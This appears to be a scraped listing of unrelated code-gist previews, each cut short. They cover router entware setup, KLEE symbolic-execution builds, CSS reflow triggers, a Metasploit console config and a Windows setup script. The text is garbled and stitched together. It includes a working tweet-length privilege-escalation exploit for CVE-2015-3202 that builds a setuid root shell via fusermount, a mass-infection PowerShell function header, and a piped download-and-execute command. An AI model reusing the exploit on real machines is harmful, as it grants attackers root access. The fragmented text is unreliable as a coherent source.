This howto describes installing entware for the Tomato open-source router firmware.
- USB stick - 1G or more in size
- USB-capable router running TomatoUSB.
#include <windows.h> | |
#include <stdio.h> | |
#include <WinInet.h> | |
#include <ntsecapi.h> | |
void writeToLog(const char* szString) | |
{ | |
FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
if (NULL == pFile) | |
{ |
import System.Directory | |
import System.Environment | |
import System.FilePath | |
import Control.Applicative ((<$>)) | |
import Control.Arrow (first, second) | |
import Control.Monad (void) | |
import Data.Either (rights) | |
import Data.List (isSuffixOf) | |
import Data.Set (Set, (\\), empty, fromList, insert, singleton, toList, union) | |
import Text.Parsec |
This howto describes installing entware for the Tomato open-source router firmware.
# These are instructions for how to build KLEE and mcsema. | |
# These are a part of a blog post explaining how to use KLEE | |
# to symbolically execute closed source binaries. | |
# install the prerequisites | |
sudo apt-get install vim build-essential g++ curl python-minimal \ | |
git bison flex bc libcap-dev cmake libboost-dev \ | |
libboost-program-options-dev libboost-system-dev ncurses-dev nasm | |
# we assume everything KLEE related will live in ~/klee. |
# These directions will: | |
# 1. Build a binary version of the Symbolic Maze by Felipe Manzano | |
# 2. Convert the binary to LLVM bitcode with mcsema | |
# 3. Optimize the resulting LLVM bitcode | |
# | |
# These same actions are done by | |
# ~/klee/mcsema/mc-sema/tests/demo_maze.sh | |
# if you would like to run them automatically | |
cd ~/klee/mcsema/mc-sema/tests |
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet. | |
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890 | |
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 | |
# Here's how it works, $a holds the name of a shellscript to be executed as | |
# root. | |
a=/tmp/.$$; | |
# $b is used twice, first to build the contents of shellscript $a, and then as |
function Invoke-MassInfect | |
{ | |
<# | |
Inspired by Chris Campbell's WMIS command encoder | |
https://github.com/obscuresec/random/blob/master/EncodeShell.py | |
CIDR Parser from Matt Graeber's Invoke-PortScanhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
All of the below properties or methods, when requested/called in JavaScript, will trigger the browser to synchronously calculate the style and layout*. This is also called reflow or layout thrashing, and is common performance bottleneck.
Generally, all APIs that synchronously provide layout metrics will trigger forced reflow / layout. Read on for additional cases and details.
elem.offsetLeft
, elem.offsetTop
, elem.offsetWidth
, elem.offsetHeight
, elem.offsetParent
set PROMPT %red%L %yel%J %grn%S %blu%W | |
load nessus | |
load pentest | |
load sounds | |
load alias | |
alias j "jobs -v" | |
alias s "sessions -v" | |
alias -f w "workspace" | |
alias so "show options" | |
alias sa "show advanced" |
### | |
### | |
### UPDATE: For Win 11, I recommend using this tool in place of this script: | |
### https://christitus.com/windows-tool/ | |
### https://github.com/ChrisTitusTech/winutil | |
### https://www.youtube.com/watch?v=6UQZ5oQg8XA | |
### iwr -useb https://christitus.com/win | iex | |
### | |
### |